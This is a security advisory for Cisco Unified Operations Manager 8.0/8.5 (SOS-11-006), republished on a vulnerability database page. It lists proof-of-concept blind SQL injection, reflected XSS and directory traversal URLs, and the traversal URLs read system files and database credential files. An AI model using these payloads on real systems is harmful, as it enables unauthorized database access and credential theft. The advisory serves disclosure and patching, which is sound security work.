Vulners
Lucene search
Cisco Unified Operations Manager Multiple Vulnerabilities - SOS-11-006
| Reporter | Title | Published | Views | Family All 44 |
|---|---|---|---|---|
 | CVE-2011-0959 | 18 May 201100:00 | – | circl |
| CVE-2011-0960 | 18 May 201100:00 | – | circl |
| CVE-2011-0961 | 18 May 201100:00 | – | circl |
| CVE-2011-0962 | 18 May 201100:00 | – | circl |
| CVE-2011-0966 | 18 May 201100:00 | – | circl |
 | Cisco Unified Operations Manager Multiple Cross-Site Scripting Vulnerabilities | 18 May 201113:28 | – | cisco |
| CiscoWorks Common Services Framework Help Servlet Cross-Site Scripting Vulnerability | 18 May 201113:17 | – | cisco |
| Cisco Unified Operations Manager Common Services Device Center Cross-Site Scripting Vulnerability | 18 May 201113:16 | – | cisco |
 | Cisco Unified Operations Manager < 8.6 Multiple Vulnerabilities | 13 Oct 201100:00 | – | nessus |
 | Cisco Common Services Devices Center Cross Site Scripting (CVE-2011-0962) | 19 Jul 201100:00 | – | checkpoint_advisories |
10
Sense of Security - Security Advisory - SOS-11-006
Release Date. 18-May-2011
Last Update. -
Vendor Notification Date. 28-Feb-2011
Product. Cisco Unified Operations Manager
Common Services Framework Help Servlet
Common Services Device Center
CiscoWorks Homepage
Note: All of the above products are
included by default in CuOM.
Platform. Microsoft Windows
Affected versions. CuOM 8.0 and 8.5 (verified),
possibly others.
Severity Rating. Medium - Low
Impact. Database access, cookie and credential
theft, impersonation, loss of
confidentiality, local file disclosure,
information disclosure.
Attack Vector. Remote with authentication
Solution Status. Vendor patch (upgrade to CuOM 8.6 as
advised by Cisco)
CVE reference. CVE-2011-0959 (CSCtn61716)
CVE-2011-0960 (CSCtn61716)
CVE-2011-0961 (CSCto12704)
CVE-2011-0962 (CSCto12712)
CVE-2011-0966 (CSCto35577)
Details.
Cisco Unified Operations Manager (CuOM) is a NMS for voice developed by
Cisco Systems. Operations Manager monitors and evaluates the current
status of both the IP communications infrastructure and the underlying
transport infrastructure in your network.
Multiple vulnerabilities have been identified in Cisco Unified
Operations Manager and associated products. These vulnerabilities
include multiple blind SQL injections, multiple XSS. and a directory
traversal vulnerability.
1. Blind SQL injection vulnerabilities that affect CuOM
CVE-2011-0960 (CSCtn61716):
The Variable CCMs of PRTestCreation can trigger a blind SQL injection
vulnerability by supplying a single quote, followed by a time delay
call:
/iptm/PRTestCreation.do?RequestSource=dashboard&MACs=&CCMs='waitfor%20
delay'0:0:20'--&Extns=&IPs=
Additionally, variable ccm of TelePresenceReportAction can trigger a
blind SQL injection vulnerability by supplying a single quote:
/iptm/TelePresenceReportAction.do?ccm='waitfor%20delay'0:0:20'--
2. Reflected XSS vulnerabilities that affect CuOM
CVE-2011-0959 (CSCtn61716):
/iptm/advancedfind.do?extn=73fcb</script><script>alert(1)</script>23fb
e43447
/iptm/ddv.do?deviceInstanceName=f3806"%3balert(1)//9b92b050cf5&deviceC
apability=deviceCap
/iptm/ddv.do?deviceInstanceName=25099<script>alert(1)</script>f813ea8c
06d&deviceCapability=deviceCap
/iptm/eventmon?cmd=filterHelperca99b<script>alert(1)</script>542256870
d5&viewname=device.filter&operation=getFilter&dojo.preventCache=129851
8961028
/iptm/eventmon?cmd=getDeviceData&group=/3309d<script>alert(1)</script>
09520eb762c&dojo.preventCache=1298518963370
/iptm/faultmon/ui/dojo/Main/eventmon_wrapper.jsp?clusterName=d4f84"%3b
alert(1)//608ddbf972
/iptm/faultmon/ui/dojo/Main/eventmon_wrapper.jsp?deviceName=c25e8"%3ba
lert(1)//79877affe89
/iptm/logicalTopo.do?clusterName=&ccmName=ed1b1"%3balert(1)//cda6137ae
4c
/iptm/logicalTopo.do?clusterName=db4c1"%3balert(1)//4031caf63d7
Reflected XSS vulnerability that affect Common Services Device Center
CVE-2011-0962 (CSCto12712):
/CSCOnm/servlet/com.cisco.nm.help.ServerHelpEngine?tag=Portal_introduc
tionhomepage61a8b"%3balert(1)//4e9adfb2987
Reflected XSS vulnerability that affects Common Services Framework
Help Servlet CVE-2011-0961 (CSCto12704):
/cwhp/device.center.do?device=&72a9f"><script>alert(1)</script>5f5251a
aad=1
3. Directory traversal vulnerability that affects CiscoWorks Homepage
CVE-2011-0966 (CSCto35577):
http://target:1741/cwhp/auditLog.do?file=..\..\..\..\..\..\..\boot.ini
cmfDBA user database info:
http://target:1741/cwhp/auditLog.do?file=..\..\..\..\..\..\..\Program
Files\CSCOpx\MDC\Tomcat\webapps\triveni\WEB-INF\classes\schedule.prope
rties
DB connection info for all databases:
http://target:1741/cwhp/auditLog.do?file=..\..\..\..\..\..\..\Program
Files\CSCOpx\lib\classpath\com\cisco\nm\cmf\dbservice2\DBServer.proper
ties
Note: When reading large files such as this file, ensure the row
limit is adjusted to 500 for example.
DB password change log:
http://target:1741/cwhp/auditLog.do?file=..\..\..\..\..\..\..\Program
Files\CSCOpx\log\dbpwdChange.log
Solution.
Upgrade to CuOM 8.6.
Refer to Cisco Bug IDs: CSCtn61716, CSCto12704, CSCto12712 and
CSCto35577 for information on patches and availability of fixes.
# 0day.today [2018-01-04] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
18 May 2011 00:00Current
7.1High risk
Vulners AI Score7.1
EPSS0.37692